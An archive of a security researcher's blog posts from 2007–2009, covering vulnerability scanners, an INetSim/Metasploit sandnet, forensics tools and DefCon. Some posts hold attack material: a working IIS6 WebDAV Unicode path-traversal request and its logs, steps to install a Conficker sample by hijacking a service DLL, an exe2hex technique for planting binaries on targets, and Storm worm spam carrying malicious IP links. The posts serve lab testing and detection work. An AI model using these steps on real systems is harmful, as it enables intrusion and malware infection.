John H. Sawyer

Nessus 4.2 Is Rockin!

2009-11-20T11:53:00.001-05:00

I've been testing the upcoming 4.2 release of the Nessus vulnerability scanner. The new Flash-based web interface is awesome. It runs smoother than the standalone client and has a great feature under the Reports section for comparing two scan results, which is great when you have a baseline to compare current results against. The first link has two video, and the second shows the compare functionality. I'll be posting additional notes and screenshots as I spend more time with the beta.

The Academy Pro has some excellent videos showing off the new features of Nessus 4.2.

Also, check out the GFI videos. They're currently giving away free T-shirts to bloggers. :-)

Sandnetting With INetSim & Metasploit

2009-11-04T00:36:00.003-05:00

I've been looking for something that might work well in a situation where I might want to redirect malicious domains to a an IP hosting numerous faux services. I've used the scripts from TRUMAN in the past but they've left a little to be desired (no reflection on Joe Stewart...the guy rocks!). I looked at Glastopf but it wasn't what I was looking for. I caught a reference to INetSim and it looked to be exactly what I wanted.

INetSim emulates about a dozen different services and can do cool things like serve up pretty much any file that is requested. For example, if a Zeus bot-infected host is looking for a new .cfg file, it will respond with a file. Now, it's not the right file, but it doesn't return a 404, either. The significant thing here is that it records all requests and can emulate the services well. Check the features page for more info.

Using VMware Fusion 3, I setup a Ubuntu 9.10 Server for my testing. The following apt-get command installed the necessary pre-requisites.

sudo apt-get install libnet-server-perl libnet-dns-perl libdigest-sha1-perl libiptables-ipv4-ipqueue-perl libipc-shareable-perl

I made a few small changes to the config file to fit my environment and was ready to go. Running "sudo ./inetsim" gets the following:

INetSim 1.1.1 (2009-09-09) by Matthias Eckert & Thomas Hungenberg
Using log directory: /home/jsawyer/downloads/inetsim-1.1.1/log/
Using data directory: /home/jsawyer/downloads/inetsim-1.1.1/data/
Using report directory: /home/jsawyer/downloads/inetsim-1.1.1/report/
Using configuration file: /home/jsawyer/downloads/inetsim-1.1.1/conf/inetsim.conf
Parsing configuration file.
Configuration file parsed successfully.
=== INetSim main process started (PID 10323) ===
Session ID is : 10323
Real Date/Time is : Tue Nov 3 22:02:21 2009
Fake Date/Time is : Tue Nov 3 22:02:21 2009 (Delta: 0 seconds)
Forking services...
* dns 53/udp/tcp - started (PID 10325)
* http 80/tcp - started (PID 10326)
* pop3 110/tcp - started (PID 10328)
* smtp 25/tcp - started (PID 10327)
* tftp 69/udp - started (PID 10329)
* ntp 123/udp - started (PID 10331)
* time 37/tcp - started (PID 10332)
* ftp 21/tcp - started (PID 10330)
* daytime 13/tcp - started (PID 10334)
* time 37/udp - started (PID 10333)
* echo 7/tcp - started (PID 10336)
* echo 7/udp - started (PID 10337)
* daytime 13/udp - started (PID 10335)
* discard 9/tcp - started (PID 10338)
* discard 9/udp - started (PID 10339)
* quotd 17/tcp - started (PID 10340)
* quotd 17/udp - started (PID 10341)
* chargen 19/tcp - started (PID 10342)
* finger 79/tcp - started (PID 10344)
* chargen 19/udp - started (PID 10343)
* syslog 514/udp - started (PID 10346)
* ident 113/tcp - started (PID 10345)
* dummy 1/tcp - started (PID 10347)
* dummy 1/udp - started (PID 10348)
done.
Simulation running.

As you can see, setup is easy. Now, how do you get the bad guys to end up at INetSim? I mentioned redirection of malicious domains earlier, but from the sandnet perspective, we can do a couple of things. The DNS dummy service within INetSim can be configured to return the same IP for all queries by configuring #dns_default_ip. But, that's too easy. Things are more fun when you use the Metasploit Framework.

We could run msfconsole from either the same host or another host and have it respond to all DNS queries with the address of the host running INetSim. First, create a file and call it anything (like fakedns.rc). In fakedns.rc, you need the following:

use auxiliary/server/fakedns
set TARGETHOST 10.227.212.231
set SRVPORT 53
run

Then, run Metasploit like this:

sudo ./msfconsole -r fakedns.rc

And, there you go. Like I said, you could use the dummy DNS within INetSim but I just felt like scripting it with Metasploit since I'd done a few custom configs lately for wireless hijacking demos.

While I've got them in front of me, here's an example of the logs of DNS queries against INetSim.

=== Report for session '10413': ===

Real start date : Tue Nov 3 22:10:15 2009
Simulated start date : Tue Nov 3 22:10:15 2009
Time difference on startup : none

2009-11-03 at 22:10:44 => First simulated date in log file
2009-11-03 at 22:10:44 => DNS connection, type: A, class: IN, requested name: www.bob.com
2009-11-03 at 22:10:51 => DNS connection, type: A, class: IN, requested name: www.b0b.com
2009-11-03 at 22:10:51 => Last simulated date in log file

===

I mentioned above that INetSim can answer pretty much any request. It responds based on the extension of the file being requested. You request a JPG, it give you back a JPG. This is all defined in the config. I'd recommend changing out the default files for something unique so that a malware author couldn't finger print your host as running INetSim because of the sample files.

http_fakefile txt sample.txt text/plain
http_fakefile htm sample.html text/html
http_fakefile html sample.html text/html
http_fakefile php sample.html text/html
http_fakefile gif sample.gif image/gif
http_fakefile jpg sample.jpg image/jpeg
http_fakefile jpeg sample.jpg image/jpeg
http_fakefile png sample.png image/png
http_fakefile bmp sample.bmp image/x-ms-bmp
http_fakefile ico favicon.ico image/x-icon
http_fakefile exe sample_gui.exe x-msdos-program
http_fakefile com sample_gui.exe x-msdos-program

Here's a couple of requests via curl showing that a JPG is being served up no matter the path requested.

jsawyer$ curl -s http://10.227.212.231/suk.jpg | hexdump -C | head -1
00000000 ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 |######JFIF.....H|
jsawyer$ curl -s http://10.227.212.231/OMG/longURL/whereisitgoing/sukeyake.jpg | hexdump -C | head -1
00000000 ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 |######JFIF.....H|

Have fun!!

Log Results of Successful IIS6 WebDAV Zero Day Attacks

2009-05-19T01:17:00.004-04:00

I covered this a bit in my DarkReading blog but wanted to continue with my testing tonight to see what else I could find out. Plus, there are some new tool updates such as an auxiliary module for Metasploit and a plugin for Nessus.

There was an interesting follow-up to the DR blog on whether or not Microsoft Outlook Web Access was vulnerable. I don't have hands-on access to an OWA box but I hope to do some more testing on Tues.

What prompted me to write this post was an interesting finding posed in the correspondence regarding the logs and why the Unicode isn't showing up. The reader was wondering why the Unicode attacks were not showing up. Let's start first with some example logs right after what my telnet test looks like followed by my speculation as to the answer.

metasploit jsawyer$ telnet 192.168.43.128 80
Trying 192.168.43.128...
Connected to 192.168.43.128.
Escape character is '^]'.
GET /..%c0%af/admin/test.txt HTTP/1.1
Translate: f
Connection: close
Host: 192.168.43.128

HTTP/1.1 200 OK
Connection: close
Date: Tue, 19 May 2009 04:42:20 GMT
Server: Microsoft-IIS/6.0
Content-Type: text/plain
Content-Length: 7
ETag: "ffbac9af6d7c91:1e1"
Last-Modified: Mon, 18 May 2009 20:20:09 GMT
Accept-Ranges: bytes

pwnage!

Telnet success:

2009-05-19 04:42:20 W3SVC1 192.168.43.128 GET /../admin/test.txt - 80 - 192.168.43.1 - 200 0 0

Metasploit finding the protected admin dir:

2009-05-19 04:33:12 W3SVC1 192.168.43.128 PROPFIND /admin/ - 80 - 192.168.43.1 - 401 2 2148074254
2009-05-19 04:33:13 W3SVC1 192.168.43.128 PROPFIND /admin/ - 80 - 192.168.43.1 - 207 0 0

As you can see in the successful telnet log entry above, the %c0%af is removed. I suspect the issue is due to how the WebDAV DLL is handling the request and that the logging occurs after the request is handle. It would make sense since the log has to accurately reflect the proper HTTP code. In this case, the vulnerable WebDAV function removes the Unicode, responds with the requested file and IIS then logs the request.

That's all I've got for now. It's nearing 2am and I'm starting to wane....

Yeah, can't sleep so, here's some logs on an Apache server from a Nessus scan with the new plugin. I'll test it against an IIS server in the morning.

- - [19/May/2009:02:04:48 -0400] "GET / HTTP/1.0" 200 45 "-" "-"
- - [19/May/2009:02:04:49 -0400] "GET / HTTP/1.0" 200 45 "-" "-"
- - [19/May/2009:02:04:53 -0400] "GET / HTTP/1.1" 200 45 "-" "-"
- - [19/May/2009:02:04:53 -0400] "GET / HTTP/1.1" 200 45 "-" "-"
- - [19/May/2009:02:04:53 -0400] "GET / HTTP/1.1" 200 45 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /login.htm HTTP/1.1" 404 328 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /intruvert/jsp/admin/Login.jsp HTTP/1.1" 404 348 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET / HTTP/1.1" 200 45 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET / HTTP/1.1" 200 45 "-" "Mozilla/4.75 [en] (X11; U; Nessus)"
- - [19/May/2009:02:04:53 -0400] "GET / HTTP/1.1" 200 45 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET / HTTP/1.1" 200 45 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /ControlManager/default.htm HTTP/1.1" 404 345 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /MSWSMTP/Common/Authentication/Logon.aspx HTTP/1.1" 404 359 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET / HTTP/1.1" 200 45 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET / HTTP/1.1" 200 45 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /commoncgi/servlet/CCGIServlet?ApHost=PDT_InterScan_NT&CGIAlias=PDT_InterScan_NT&File=logout.htm HTTP/1.1" 404 348 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET / HTTP/1.1" 200 45 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /oGR_FLrEIIM_.html HTTP/1.1" 404 336 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /oGR_FLrEIIM_.cgi HTTP/1.1" 404 335 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /oGR_FLrEIIM_.sh HTTP/1.1" 404 334 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /oGR_FLrEIIM_.pl HTTP/1.1" 404 334 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /oGR_FLrEIIM_.inc HTTP/1.1" 404 335 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /oGR_FLrEIIM_.shtml HTTP/1.1" 404 337 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /oGR_FLrEIIM_.asp HTTP/1.1" 404 335 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /oGR_FLrEIIM_.php HTTP/1.1" 404 335 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /oGR_FLrEIIM_.php3 HTTP/1.1" 404 336 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /oGR_FLrEIIM_.cfm HTTP/1.1" 404 335 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /cgi-bin/oGR_FLrEIIM_.html HTTP/1.1" 404 344 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /cgi-bin/oGR_FLrEIIM_.cgi HTTP/1.1" 404 343 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /cgi-bin/oGR_FLrEIIM_.sh HTTP/1.1" 404 342 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /cgi-bin/oGR_FLrEIIM_.pl HTTP/1.1" 404 342 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /cgi-bin/oGR_FLrEIIM_.inc HTTP/1.1" 404 343 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /cgi-bin/oGR_FLrEIIM_.shtml HTTP/1.1" 404 345 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /cgi-bin/oGR_FLrEIIM_.php HTTP/1.1" 404 343 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /cgi-bin/oGR_FLrEIIM_.php3 HTTP/1.1" 404 344 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /cgi-bin/oGR_FLrEIIM_.cfm HTTP/1.1" 404 343 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET / HTTP/1.1" 200 45 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "OPTIONS * HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"

F-Response 3.09 Trial Run & Screenshots

2009-04-10T16:45:00.011-04:00

On Tuesday, I received a package in the mail from Matt Shannon, founder and creator of F-Response. Inside was a small, F-Response-branded USB thumb drive containing the upcoming release of F-Response due out April 15, 2009. I updated my dongle, installed the new license manager and was ready to begin testing.

One of the first things I noticed is the newly redesigned license manager to replace the NetUnikey Server! Thank you, thank you, thank you. The third-party NetUnikey Server for dongle authentication in previous releases sucked, and I even ran into some bizarre network issues where it wouldn't authenticate in version 1.18 but was fine in the 2.x betas. Now, that's all fixed and working great. For those of you unfamiliar with the product, their is a licensing dongle. In the Field Kit edition, it has to be plugged into the host you are examining. In the Consultant and Enterprise editions, the dongle can be plugged into the analyst's workstation. When the F-Response client runs on the host being analyzed, it first must authenticate to the workstation with the dongle in it. It was the NetUnikey Server that used to accept and authenticate the requests from the F-Response clients. Now, it's gone and the F-Response License Manager serves that purpose in version 3.09.

The next major feature addition is the inclusion of the new management interfaces in the Enterprise and Consultant editions. They make deployment and connecting to remote disks a piece of cake. The Enterprise Management Console allows you to push the F-Response enterprise service to hosts you have admin rights to, start the service and connect to the disks and memory. The Consultant Connector makes it easy to connect to disks from hosts on which the Consultant F-Response client is running. There are several videos over at the F-Response site if you want to see them in action (linked to by their names above). The Enterprise Management Console will definitely be a head turner for companies who have been looking to replace products like Encase Enterprise but weren't sure if F-Response was the solution. It's about time to take a another look if you're one of those groups.

For me, the most exciting new features were the inclusion of support for Mac OS X and Linux in the Enterprise and Consultant versions. Previously, support for those OS's were only on the Field Kit edition. So far, F-Response has been working flawlessly on Mac and Linux. Earlier this week, I witnessed two Mac OS X machines have their entire 200+GB hard drives images over the network with F-Response. I personally tested a Mac Book Pro with the latest version of OS X, a fully updated Ubuntu Linux system and a Windows XP SP3 system.

In this screenshot, you can see the different options available in the Mac OS X client.
I created an autoconfigure ".ini" file using the Windows F-Response client, which has a GUI interface where you enter the IP of the host with the dongle and the user credentials to connect back into the machine over iSCSI. As you can see in this screenshot, I ran the executable with the "-c" option followed by the autoconfigure file I had created from the Windows client. The F-Response client authenticated, mounted the available drives and started listening for connections via iSCSI.Did you notice how there were two drives in the last screenshot that were mounted read-only? What's worth noting is that this is my MacBook Pro which only has one hard drive. I use FileVault for encrypting my Home directory. The second drive is my Home directory mounted. I know one of the big features in Windows was the ability to access disk Volumes and not just raw hard drives, but I was surprised to see this behavior. I haven't tested imaging the mounted Home directory via F-Response, yet, but should be interesting.

This next screenshot is of the Linux F-Response client. It's pretty much identical to the Mac version and works with the same autoconfigure file as both Windows and Linux. This is a great feature allowing you to create CDs to hand out to your help desk with all versions of the client and only one ".ini".
This next screenshot is FTK Imager connected to a Linux host. While I was testing, I only looked around the filesystem a bit, but I could have easily imaged the drive. I think one of the things I like about F-Response the most is the flexibility it gives me to use pretty much any forensic tool I want whether it's FTK, Encase, RegRipper or anything else. It really lives up to its slogan by extending your arsenal.

Go Infect Yourself...with Conficker

2009-04-01T16:28:00.004-04:00

I'd been wanting to do some testing with Conficker to see if my IDS rules were truly working and whether or not some of the new detection tools released Monday were accurate (DarkReading: "Conficker Detection...Let Me Count The Ways"). Knowing that just running an EXE wasn't all that easy based on some of the analysis from the Internet Storm Center (here and here), I started digging around for some good samples of Conficker and instructions. First, I grabbed a few samples from Offensive Computing's malware archive. Next, I went looking for some hints on the best way to load the samples and found a related thread on Offensive Computing where someone was looking for a Conficker.C sample.

So, here's the quick and dirty. We'll download the sample, rename it, copy it to system32 dir and edit a useless service to load it on startup.

Grab the file here.
Rename it to "booyah.dll"
Copy "booyah.dll" to "C:\Windows\System32\"
Open Regedit and navigate to \HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Nla\Parameters
Right click on "ServiceDll", click "Modify", change the current DLL to point to "booyah.dll", and click OK
Close Regedit and Reboot.

Now, your machine is infected. To verify, go to some sites like McAfee and SecureWorks that are blocked, or try out the Conficker Eye Chart.

What's next? If you've done malware analysis before, you know you should have been capturing ALL network traffic from this host. Continue sniffing and looking for interesting things. Capture all of the traffic to disk with tcpdump, tshark or daemonlogger. Then run it through Snort with the Emerging Threats ruleset or ngrep looking for interesting strings. The possibilities are endless.

Oh yeah, don't forget to put this behind some kind of firewall or filtering device so you can keep a handle on it. I've got mine sitting behind a Vyatta-based bridging firewall that is working quite well for this use. I'm also sniffing directly on the bridged interface.

Conficker Eye Chart

2009-04-01T13:24:00.001-04:00

Joe Stewart put together a great little page that leverages the feature of Conficker that blocks certain websites. I've mirrored that content here to save Joe some bandwidth.

The page is really simple in that it loads images from the different websites. If you're infected, you'll see images missing. He has included a chart on how to determine what you might be infected with. If you are infected, check out the Internet Storm Center's page full of links on how to get cleaned up.

Windows Physical Memory Roundup

2008-12-19T18:35:00.001-05:00

I put together a comprehensive list of Windows physical memory tools that's posted over at the SANS Computer Forensics Blog. The list includes acquisition and analysis tools along with a brief description, whether it is free or commercial and screenshots if available. Take a look if you have an interest in Windows memory analysis.

Windows Physical Memory: Finding the Right Tool for the Job

Weaponizing USB Flash Drives with the Addonics NAS Adapter

2008-12-12T17:00:00.001-05:00

It's kind of interesting how I start out to write something and it ends up being totally different from what I was planning. Today's post at Dark Reading was like that. My original intent was to focus on data sprawl due to proliferation of physically small, large storage capacity flash drives. What I ended up with was a bad ass idea of weaponizing the Addonics NAS Adapter into a MitM attack tool for scarfing up network data including VoIP calls.

Take a trip down the rabbit hole with "USB Flash Drive Network Weaponization."

BTW, here's a link to the PDF of Larry Pesce's "Rogue APs for Penetration Testers" presentation. He's my inspiration for hiding small electronic devices in obscure places.

Mini Wish List

2008-12-12T11:10:00.001-05:00

Here's a quick wish list for anyone who is still stumped on what to get me. I did put down gift certificates for two of the sites, but that's because it would be impossible to list all the little items from each site I'm interested in like a Super TV-B-Gone kit,
DIY Design Electronics Kit, Mousebot Kit, Blinkybug Kit, Tiny Cylon Kit, USB7 6 Digit LED Display Kit, Solarspeeder Kit, Learn to Solder Kit, Maker Bundle #1, Bare Bones Aduino Board Kit,

iPod Touch

2008-11-05T02:28:00.001-05:00

I've had my new iPod for a week now and am loving it. Email is great and now I'm testing out a blogging app that seems to work well so far. My favorite app so far is ByLine that syncs my Google Reader RSS feeds so I can read them offline making it easy to stay on top of them. Ok, test over. More cool memory forensic stuff to come.

Encase, Physical Memory and E01s

2008-11-04T00:20:00.005-05:00

Short disclaimer: This post is primarily for the sake of posterity and keeping track of some of the stuff I had laying around to get where I am in the research I'm doing right now. I've done a lot more testing with physical memory acquisition using winen, mdd, win32dd, and Encase both locally on live systems and on remote systems using F-Response in an effort to see the compatibility of the different outputs with Encase memory analysis Enscripts, Volatility Framework and Memoryze.

I don't remember which version of Encase added physical and process memory support but it was the 6.11 release that included winen.exe, a standalone utility to create an image/dump of physical memory. The resulting file was, of course, in the EWF/E01 format. The interesting thing is that when the E01's containing memory are opened in Encase, it knows that they represent memory so the icon in Encase changes from usual hard drive icon to a memory chip. Here's a screenshot.
How does Encase know? I thought it was based on the following dialog and I'd be able to change this within Encase by right-clicking on an entry but modifying the entries like those in the following image did nothing.
It turns out that Guidance Software has made an addition to the E01 file so that there is a new media type identifier, 0x10. Taking at look at a memory image created by winen, ewfinfo from the libefw project shows the Media Type as RAM.

ewfinfo 20080609 (libewf 20080609, zlib 1.2.3, libcrypto 0.9.7)

Acquiry information
Case number: AAAAAAAAAAAA
Description: winen-nocomp
Examiner name: BBBBBBBBBBBB
Evidence number: CCCCCCCCCCCC
Operating system used: Windows XP
Software version used: 6.11
Password: N/A
Unknown value ext: 0

Media information
Media type: RAM
Media is physical: yes
Amount of sectors: 130940
Bytes per sector: 4096
Media size: 511 MiB (536330240 bytes)
Error granularity: 1
Compression type: no compression
GUID: 837687b1-988d-2c44-a8f4-84874692842a
MD5 hash in file: 26b6d584f7289baeecb64a79adc6f60b

Note: Latter beta versions since 20080609 lost the LIBEWF_MEDIA_TYPE_RAM so they show up like this:

ewfinfo 20081013 (libewf 20081013, libuna 20081011, zlib 1.2.3, libcrypto 0.9.7)

Acquiry information
Case number: AAAAAAAAAAAA
Description: winen-nocomp
Examiner name: BBBBBBBBBBBB
Evidence number: CCCCCCCCCCCC
Operating system used: Windows XP
Software version used: 6.11
Password: N/A
Unknown value ext: 0

Media information
Media type: unknown (0x10)
Media is physical: yes
Amount of sectors: 130940
Bytes per sector: 4096
Media size: 511 MiB (536330240 bytes)
Error granularity: 1
Compression type: no compression
GUID: 837687b1-988d-2c44-a8f4-84874692842a
MD5 hash in file: 26b6d584f7289baeecb64a79adc6f60b

Winen is great for incident response and gathering memory from live systems, but you can also access physical memory and individual processes on the same machine you're running Encase on, it's as easy as clicking the related boxes on the "Add Device" dialog in Encase.

Documentation on EWF (E01) File Format

Cold Boot Memory Attack on TV Show "My Own Worst Enemy"

2008-11-03T21:48:00.003-05:00

I'm checking out the new series "My Own Worst Enemy" with Christian Slater. In episode two around the 40 minute mark, they are being briefed on how they are going to infiltrate the enemy's headquarters. Someone mentions that the computers will be encrypted and a geeky dude says no problem, this can right here will freeze the memory so you can extract the encryption keys. Amazing!

When they get in, one of the guys is seen opening the side of a computer, briefly spraying the can into the machine, pulling out a RAM chip with tweezers and putting it into some sort of small circuit board that is then analyzed by a small subnotebook.

Pretty cool stuff. I'm very impressed, at lease after seeing all the technological crap the show "24" has butchered.

MS06-040 & MS08-067 Similarities

2008-10-28T01:07:00.003-04:00

People reversing the vulnerable code have discovered that the new MS08-067 vulnerability was present right next to the MS06-040 vulnerable code but was never noticed. Interesting. Are we really supposed to believe that noone noticed this sooner other than the recent malware being blamed for it being outed? Alright, enough conspiracy theory.

There's an exploit for MS08-067 recently posted at Milw0rm that I was testing out tonight. Out of sheer curiosity, I uploaded the precompiled binary to VirusTotal and it had already been uploaded so there was an analysis waiting on me. The previous analysis showed 8 out 36 AV engines detecting it. Now, there's 9.

What I thought was most interesting is this:

eTrust-Vet 31.6.6176 2008.10.28 Win32/MS06-040!exploit

That seems pretty darn close to me. Since the source is available for the exploit, I'll leave it to someone to dig up the old source of exploits for MS06-040 and see if there was some code sharing between the two or if the similarity of the vulnerability is causing eTrust to identify it this way.

Shellcode Testing

2008-09-22T22:57:00.002-04:00

I was working on an exploit last week that was having a problem. At one point, I thought it might have been the shellcode I was using so I started looking for some old C code I had for testing to make sure shellcode actually ran. Nowhere to be found, I turned to Google and found the following blog that had C code and an interesting usage for it to analyze shellcode seen in malicious websites. The author extracted the shellcode from the page and put it in this C code, compiled it and ran it through Ollydbg for analysis. SIDE NOTE: Immunity has released an updated, more powerful version of Olly as the free Immunity Debugger.

While the author did all this on Windows, the C code works fine on other operating systems. For example, I was working with it on FreeBSD and had no problems.

A new obsession?

2008-08-19T02:07:00.001-04:00

At DefCon 16, I finally got to see some of the other things going on other than CTF. I didn't see much but the thing that really left its mark was the Hardware Hacking Village. Greg and I went up there and I saw about 30 geeks or more going at it with soldering irons, miscellaneous computer scraps and DC16 badges. It was a cool site.

Greg had already been up there before and soldered a USB port onto his badge. I'd tried soldering a couple of times in my lifetime and failed pretty badly. This time, I was careful, asked for advice from experienced hardware hackers and was able to successfully solder on a working USB port.

What a rush! I'm totally hooked and have bought a couple of soldering irons (electric and butane) to work on modding all of my badges (DC 14-16). I've got a JTAG programmer at the office somewhere that I'm going to have to dig up to work on the previous badges, I think.

The thing I really want to build is a RFID cloner. The simplest, but most effective one I've found so far is the one from Chris Paget of IOActive but his BlackHat presentation with info on building it was squashed. :-( Oh well, I'll keep searching for something that will work. It may come down to having a separate reader and transmitter/writer. I don't really care too much as long as it is portable so I can use it during physical pentests.

As if I needed another obsession.

DefCon 16 retrospective

2008-08-19T01:50:00.001-04:00

I won't bother going into any detail about the Capture the Flag competition here. You can read my blog entry over at Dark Reading or @tlas' blog for more information about our 3rd place finish and sk3wl 0f r00t's well-deserved victory. I did have an awesome time as I've had in the previous years when we won, learned a great deal from all aspects of the CTF experience and truly enjoyed spending time with my friends and teammates from the 1@stplace.

What else did I do while in Vegas for DefCon?

Thurs night, I finally met Tim and Kelly from Dark Reading in person for a fantastic time chatting and eating at the Mesa Grill in Caesar's Palace. They've been my editors for a year, now, and I'd never actually met them. We really had a great time. Afterwards, Kelly and I went by the Core Security party where we met their new CEO, Mark Hatton, Ivan Arce, Matt Hines, several other Core employees along with Rich Mogull and Mike Rothman. I picked up a couple of their Core Exploit "Black Hat Edition" card game but haven't had a chance to play it yet. Afterwards, Kelly tried to get me into the Microsoft party....FAIL.

Friday...CTF...then Plato's room to work on CTF stuff until 2:30am.

Saturday...CTF...then Plato's room to work on CTF stuff until 2:30am.

(Note: if you talk to any of my teammates, they'll tell you I did take a couple small naps during the late nights and won the "quickest to fall asleep" award along with answering a few questions while sleeping...questions that weren't asked to me.)

Sunday...CTF...but, then, I went to the Hardware Hacking Village and soldered on a USB port so I could so some badge hacking after I returned home. Next, I went to the first presentation I've ever seen at a DefCon conference. Why the first one you ask? Because CTF takes up the entire weekend! So, the presentation was "Stealing the Internet: An Internet-Scale Man in the Middle Attack." It was pretty cool. I admit that I don't know much about BGP so I probably thought this was way cooler than some other people but the room was packed. The sweetest part of the presentation was that they had hijacked the DefCon network at the Riviera and had been routing through and collecting all the passing traffic through their colocation company in NY. Wicked!

Sunday night...the DC16 Awards Ceremony was so packed and I knew we didn't win that I decided to head off to dinner with Greg. We ate at an awesome Koren BBQ restaurant and headed down the strip to relax. We wound up at Casa Fuente where we had a few mojitos and smoked some nice Ashton cigars. Afterwards, we walked the strip and made our way back to the Riviera where Greg had to get a little gambling out of his system.

Monday...I spent the day in airports and on airplanes heading home.

DefCon 16 rocked! Thank you to all my friends that I was able to see again, my brothers-in-arms from 1@stplace, Kenshoto for a great game and the DC16 organizers. See you next year!!

I'll post my pics soon.

exe2hex.rb: old school pwnage

2008-05-20T02:02:00.005-04:00

I figured I'd better put this up before I keep having more ideas of how to improve it and never end up posting it.

What is it? Just over a month ago, a buddy (who's recently begun working for a BIG company that just happens to do some pentesting) was telling me about a pentest where they weren't allowed to upload software so he had to write something in a batch file. While we were chatting, I began telling him of the different ways I've seen attackers put files on Windows systems: tftp, ftp (with & without scripts), wget-like VBscript and echo.

While echo was integral in most of the above techniques (ftp script & VBscript), I'd seen a handful of hacks back in 2005 where an attacker used echo and pasted hex into a file. When the file was complete, he ran "debug < 123.hex". Renamed the resulting file to end with ".exe" and his tool was complete.

After digging through some really old incidents I'd investigated, I found some real world examples of the technique used during compromises. A little bit of Google-ing revealed these two links to a forum post describing the technique in 2004 and mention in a Phrack article.

After sitting in on part of Ed Skoudis' new Security 560 Penetration Testing class, I saw that his class didn't mention this technique but it covered just about all the others above. Since I would one day like to be efficient at writing ruby, I wrote exe2hex.rb based on the C code from Riftor.

Currently, due to a limitation in Microsoft's debug.exe, files must be smaller than 65,280 bytes. My next version will automatically split up files to be under the correct size and convert each one to hex. Once echo'd and converted on the target host, the individual files can be joined with "copy file1+file2+file3 /b dest /b" (or at least it should work that way...need to do more testing).

Where does this tool come in handy...I have some ideas but they'll have to wait. I need to pack things up here in the lab and head home.

Storm <3's You!

2008-01-15T14:01:00.000-05:00

Storm (Nuwar, CME711, etc) just reminded me that Valentine's is less than a month away. I've gotten four recycled e-mails looking to spread some love. When I first got the copies, only two AV vendors (NOD32v2 & Webwasher-Gateway) on VirusTotal.com were detecting it as malicious.

Subject: Our Love is Free
Body: When Love Comes Knocking http://69.212.48.3/

Subject: I Love Thee
Body: Words in my Heart http://24.1.116.187/

Subject: A Is For Attitude
Body: A Dream is a Wish http://222.107.37.211/

Subject: Eternity of Your Love
Body: The Moon & Stars http://68.57.210.178/

The webpage contains some URL encoded text that links to "with_love.exe"

'%3C%61%20%68%72%65%66%3D%22%77%69%74%68%6C%6F%76%65%2E%65%78%65%22%3E%0D%0A'

Tethering a Verizon BlackBerry 8830 with Mac OS X Leopard

2007-11-04T17:44:00.000-05:00

